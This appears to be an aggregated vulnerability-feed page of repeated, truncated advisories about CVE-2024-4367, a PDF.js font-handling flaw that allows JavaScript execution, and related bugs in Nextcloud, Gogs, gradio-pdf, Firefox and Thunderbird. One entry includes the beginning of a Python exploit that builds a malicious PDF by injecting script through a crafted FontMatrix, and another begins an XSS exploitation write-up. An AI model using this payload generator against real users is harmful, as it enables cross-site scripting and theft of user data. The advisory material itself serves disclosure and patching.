CVE-2024-4367: A type check was missing when handling fonts in PDF.js, which would allow arbitrary JavaScript execution in the PDF.js context. This vulnerability affects…

CVE-2025-59788 [HIGH] CWE-749 GHSA-88cv-g9gq-h6pq: Cross-site scripting (XSS) vulnerability in a reachable files_pdfviewer example directory in Nextcloud with versions before 22 Cross-site scripting (XSS) vulnerability in a reachable files_pdfviewer example directory in Nextcloud with versions before 22.2.10.33, 23.0.12.29, 24.0.12.28, 25.0.13.23, 26.0.13.20, 27.1.11.20, 28.0.14.11, 29.0.16.8, 30.0.17, 31.0.10, and 32.0.1 allows attackers to execute arbitrary JavaScript in the context of a user's browser via a crafted PDF file to viewer.html. This issue is related to CVE-2024-4367, but the root cause of this Nextcloud issue is that the product exposes executable example code on a same-origin basis.

CVE-2025-47943 [HIGH] Gogs XSS allowed by stored call in PDF renderer Gogs XSS allowed by stored call in PDF renderer ### Summary A stored XSS is present in Gogs which allows client-side Javascript code execution. ### Details Gogs Version: ``` docker images REPOSITORY TAG IMAGE ID CREATED SIZE gogs/gogs latest fe92583bc4fe 10 hours ago 99.3MB ``` Application version: `0.14.0+dev` Local setup using: ```bash # Pull image from Docker Hub. docker pull gogs/gogs # Create local directory for volume. sudo mkdir -p /var/gogs # Use `docker run` for the first time. docker run --name=gogs -p 10022:22 -p 10880:3000 -v /var/gogs:/data gogs/gogs ``` The vulnerability is caused by the usage of a vulnerable and outdated component: `pdfjs-1.4.20` under public/plugins/. Read more about this vulnerability at [codeanlabs - CVE-2024-4367](https://codeanlabs.com/blog/res

CVE-2025-47943 [HIGH] CWE-79 Gogs XSS allowed by stored call in PDF renderer Gogs XSS allowed by stored call in PDF renderer ### Summary A stored XSS is present in Gogs which allows client-side Javascript code execution. ### Details Gogs Version: ``` docker images REPOSITORY TAG IMAGE ID CREATED SIZE gogs/gogs latest fe92583bc4fe 10 hours ago 99.3MB ``` Application version: `0.14.0+dev` Local setup using: ```bash # Pull image from Docker Hub. docker pull gogs/gogs # Create local directory for volume. sudo mkdir -p /var/gogs # Use `docker run` for the first time. docker run --name=gogs -p 10022:22 -p 10880:3000 -v /var/gogs:/data gogs/gogs ``` The vulnerability is caused by the usage of a vulnerable and outdated component: `pdfjs-1.4.20` under public/plugins/. Read more about this vulnerability at [codeanlabs - CVE-2024-4367](https://codeanlabs.com/blog/res

CVE-2024-4367 [HIGH] CWE-79 Arbitrary JavaScript execution due to using outdated libraries Arbitrary JavaScript execution due to using outdated libraries ### Summary gradio-pdf projects with dependencies on the pdf.js library are vulnerable to CVE-2024-4367, which allows arbitrary JavaScript execution. ### PoC 1. Generate a pdf file with a malicious script in the fontmatrix. (This will run `alert(‘XSS’)`.) [poc.pdf](https://github.com/user-attachments/files/15516798/poc.pdf) 2. Run the app. In this PoC, I've used the demo for a simple proof. 3. Upload a PDF file containing the script. 4. Check that the script is running. ### Impact Malicious scripts can be injected into the code, and when linked with vulnerabilities such as CSRF, it can cause even greater damage. In particular, It can become a source of further attacks, especially when linked to social engineering. ###

CVE-2024-4367 [HIGH] Arbitrary JavaScript execution due to using outdated libraries Arbitrary JavaScript execution due to using outdated libraries ### Summary gradio-pdf projects with dependencies on the pdf.js library are vulnerable to CVE-2024-4367, which allows arbitrary JavaScript execution. ### PoC 1. Generate a pdf file with a malicious script in the fontmatrix. (This will run `alert(‘XSS’)`.) [poc.pdf](https://github.com/user-attachments/files/15516798/poc.pdf) 2. Run the app. In this PoC, I've used the demo for a simple proof. 3. Upload a PDF file containing the script. 4. Check that the script is running. ### Impact Malicious scripts can be injected into the code, and when linked with vulnerabilities such as CSRF, it can cause even greater damage. In particular, It can become a source of further attacks, especially when linked to social engineering. ###

CVE-2024-4767 [HIGH] firefox regressions firefox regressions USN-6779-1 fixed vulnerabilities in Firefox. The update introduced several minor regressions. This update fixes the problem. Original advisory details: Multiple security issues were discovered in Firefox. If a user were tricked into opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information across domains, or execute arbitrary code. (CVE-2024-4767, CVE-2024-4768, CVE-2024-4769, CVE-2024-4771, CVE-2024-4772, CVE-2024-4773, CVE-2024-4774, CVE-2024-4775, CVE-2024-4776, CVE-2024-4777, CVE-2024-4778) Jan-Ivar Bruaroey discovered that Firefox did not properly manage memory when audio input connected with multiple consumers. An attacker could potentially exploit this issue to cause a denial of

CVE-2024-4767 [HIGH] thunderbird vulnerabilities thunderbird vulnerabilities Multiple security issues were discovered in Thunderbird. If a user were tricked into opening a specially crafted website in a browsing context, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information, bypass security restrictions, cross-site tracing, or execute arbitrary code. (CVE-2024-4767, CVE-2024-4768, CVE-2024-4769, CVE-2024-4777) Thomas Rinsma discovered that Thunderbird did not properly handle type check when handling fonts in PDF.js. An attacker could potentially exploit this issue to execute arbitrary javascript code in PDF.js. (CVE-2024-4367) Irvan Kurniawan discovered that Thunderbird did not properly handle certain font styles when saving a page to PDF. An attacker could potentially exploit this issu

CVE-2024-4767 [HIGH] firefox vulnerabilities firefox vulnerabilities Multiple security issues were discovered in Firefox. If a user were tricked into opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information across domains, or execute arbitrary code. (CVE-2024-4767, CVE-2024-4768, CVE-2024-4769, CVE-2024-4771, CVE-2024-4772, CVE-2024-4773, CVE-2024-4774, CVE-2024-4775, CVE-2024-4776, CVE-2024-4777, CVE-2024-4778) Jan-Ivar Bruaroey discovered that Firefox did not properly manage memory when audio input connected with multiple consumers. An attacker could potentially exploit this issue to cause a denial of service, or execute arbitrary code. (CVE-2024-4764) Thomas Rinsma discovered that Firefox did not properly handle type check when handling fonts in

CVE-2024-4367 [HIGH] CVE-2024-4367: A type check was missing when handling fonts in PDF A type check was missing when handling fonts in PDF.js, which would allow arbitrary JavaScript execution in the PDF.js context. This vulnerability affects Firefox < 126, Firefox ESR < 115.11, and Thunderbird < 115.11.

CVE-2024-4367 [HIGH] PDF.js vulnerable to arbitrary JavaScript execution upon opening a malicious PDF PDF.js vulnerable to arbitrary JavaScript execution upon opening a malicious PDF ### Impact If pdf.js is used to load a malicious PDF, and PDF.js is configured with `isEvalSupported` set to `true` (which is the default value), unrestricted attacker-controlled JavaScript will be executed in the context of the hosting domain. ### Patches The patch removes the use of `eval`: https://github.com/mozilla/pdf.js/pull/18015 ### Workarounds Set the option `isEvalSupported` to `false`. ### References https://bugzilla.mozilla.org/show_bug.cgi?id=1893645

CVE-2024-4367 [HIGH] CWE-754 PDF.js vulnerable to arbitrary JavaScript execution upon opening a malicious PDF PDF.js vulnerable to arbitrary JavaScript execution upon opening a malicious PDF ### Impact If pdf.js is used to load a malicious PDF, and PDF.js is configured with `isEvalSupported` set to `true` (which is the default value), unrestricted attacker-controlled JavaScript will be executed in the context of the hosting domain. ### Patches The patch removes the use of `eval`: https://github.com/mozilla/pdf.js/pull/18015 ### Workarounds Set the option `isEvalSupported` to `false`. ### References https://bugzilla.mozilla.org/show_bug.cgi?id=1893645

[HIGH] Firefox regressions Title: Firefox regressions Summary: USN-6779-1 caused some minor regressions in Firefox. USN-6779-1 fixed vulnerabilities in Firefox. The update introduced several minor regressions. This update fixes the problem. Original advisory details: Multiple security issues were discovered in Firefox. If a user were tricked into opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information across domains, or execute arbitrary code. (CVE-2024-4767, CVE-2024-4768, CVE-2024-4769, CVE-2024-4771, CVE-2024-4772, CVE-2024-4773, CVE-2024-4774, CVE-2024-4775, CVE-2024-4776, CVE-2024-4777, CVE-2024-4778) Jan-Ivar Bruaroey discovered that Firefox did not properly manage memory when audio input connected with multiple consumers.

CVE-2024-4767 [HIGH] Thunderbird vulnerabilities Title: Thunderbird vulnerabilities Summary: Several security issues were fixed in Thunderbird. Multiple security issues were discovered in Thunderbird. If a user were tricked into opening a specially crafted website in a browsing context, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information, bypass security restrictions, cross-site tracing, or execute arbitrary code. (CVE-2024-4767, CVE-2024-4768, CVE-2024-4769, CVE-2024-4777) Thomas Rinsma discovered that Thunderbird did not properly handle type check when handling fonts in PDF.js. An attacker could potentially exploit this issue to execute arbitrary javascript code in PDF.js. (CVE-2024-4367) Irvan Kurniawan discovered that Thunderbird did not properly handle certain font styles when s

CVE-2024-4768 [HIGH] Firefox vulnerabilities Title: Firefox vulnerabilities Summary: Several security issues were fixed in Firefox. Multiple security issues were discovered in Firefox. If a user were tricked into opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information across domains, or execute arbitrary code. (CVE-2024-4767, CVE-2024-4768, CVE-2024-4769, CVE-2024-4771, CVE-2024-4772, CVE-2024-4773, CVE-2024-4774, CVE-2024-4775, CVE-2024-4776, CVE-2024-4777, CVE-2024-4778) Jan-Ivar Bruaroey discovered that Firefox did not properly manage memory when audio input connected with multiple consumers. An attacker could potentially exploit this issue to cause a denial of service, or execute arbitrary code. (CVE-2024-4764) Thomas Rinsma discovered that Fi

CVE-2024-4367 [HIGH] CWE-754 Mozilla: Arbitrary JavaScript execution in PDF.js Mozilla: Arbitrary JavaScript execution in PDF.js A type check was missing when handling fonts in PDF.js, which would allow arbitrary JavaScript execution in the PDF.js context. This vulnerability affects Firefox < 126, Firefox ESR < 115.11, and Thunderbird < 115.11. A flaw was found in Mozilla. The Mozilla Foundation Security Advisory describes this flaw as follows: A type check was missing when handling fonts in PDF.js, which would allow arbitrary JavaScript execution in the PDF.js context. Statement: Red Hat Product Security rates the severity of this flaw as determined by the Mozilla Foundation Security Advisory. Package: firefox (Red Hat Enterprise Linux 6) - Out of support scope Package: thunderbird (Red Hat Enterprise Linux 6) - Out of support scope

CVE-2024-4367 [HIGH] CVE-2024-4367: firefox - A type check was missing when handling fonts in PDF.js, which would allow arbitr... A type check was missing when handling fonts in PDF.js, which would allow arbitrary JavaScript execution in the PDF.js context. This vulnerability affects Firefox < 126, Firefox ESR < 115.11, and Thunderbird < 115.11. Scope: local sid: resolved (fixed in 126.0-1)

CVE-2024-4367 [HIGH] Mozilla Foundation Security Advisory 2024-21: CVE-2024-4367 Mozilla Foundation Security Advisory 2024-21 CVE: CVE-2024-4367 Product: Firefox Impact: moderate Fixed in: Firefox 126

CVE-2024-4367 [HIGH] Mozilla Foundation Security Advisory 2024-22: CVE-2024-4367 Mozilla Foundation Security Advisory 2024-22 CVE: CVE-2024-4367 Product: Firefox ESR Impact: moderate Fixed in: Firefox ESR 115.11

CVE-2024-4367 [HIGH] Mozilla Foundation Security Advisory 2024-23: CVE-2024-4367 Mozilla Foundation Security Advisory 2024-23 CVE: CVE-2024-4367 Product: Thunderbird Impact: moderate Fixed in: Thunderbird 115.11

CVE-2024-4367 [HIGH] Firefox ESR 115.11 - PDF.js Arbitrary JavaScript execution Firefox ESR 115.11 - PDF.js Arbitrary JavaScript execution --- # Exploit Title: Firefox ESR 115.11 - Arbitrary JavaScript execution in PDF.js # Date: 2025-04-16 # Exploit Author: Milad Karimi (Ex3ptionaL) # Contact: [email protected] # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL # MiRROR-H: https://mirror-h.org/search/hacker/49626/ # Vendor Homepage: https://wordpress.org # Version: = 115.11 # Tested on: Win, Ubuntu # CVE : CVE-2024-4367 #!/usr/bin/env python3 import sys def generate_payload(payload): backslash_char = "\\" fmt_payload = payload.replace('(', '\\(').replace(')', '\\)') font_matrix = f"/FontMatrix [0.1 0 0 0.1 0 (1{backslash_char});\n" + f"{fmt_payload}" + "\n//)]" return f""" %PDF-1.4 %DUMMY 8 0 obj > /ShadingType 2 /Coords[46 400 537 400] /Extend[false fals

Arbitrary Javascript injection in PDF.js through FontMatrix Arbitrary Javascript injection in PDF.js through FontMatrix Created attachment 9398837 js_injection_poc.pdf (Tested with Firefox 124.0b9 on Ubuntu and with PDF.js latest from Git.) Arbitrary Javascript code can be executed in the PDF.js context (unrelated to the Javascript sandbox) by abusing a lack of type checking in the glyph path compilation process, specifically when a Type 1 font is involved. A prerequisite is that `isEvalSupported` needs to be true (it is by default). This results in a somewhat universal XSS when a PDF is opened with Firefox (cross-origin restrictions are still in place). An attacker can control the PDF.js window and do things like spy on the user’s activity, trigger downloads using `pdf.js.message` events (even file:// URLs can be “downloaded” in this way) or l

CVE-2024-4367 [HIGH] Upload / README # Upload ## Exploring the Intricacies of CVE-2024-4367 in PDF.js Library for XSS Exploits ### Authored by: @S0nG0ku ### Title: Exploiting CVE-2024-4367 in PDF.js Library for XSS Vulnerabilities #### Introduction: CVE-2024-4367 presents a critical vulnerability within the esteemed PDF.js library, widely embraced for its adeptness in rendering PDF files in web browsers. This particular exploit enables adversaries to inject and execute arbitrary JavaScript code within a user's browser context, catalyzing a perilous Cross-Site Scripting (XSS) scenario. #### In-Depth Analysis: - Delving into the Application's PDF File Upload Mechanism: ```javascript const upload = multer({ storage: storage, fileFilter: (req, file, cb) => { if (file.mimetype == "application/pdf") { cb(null, true); } else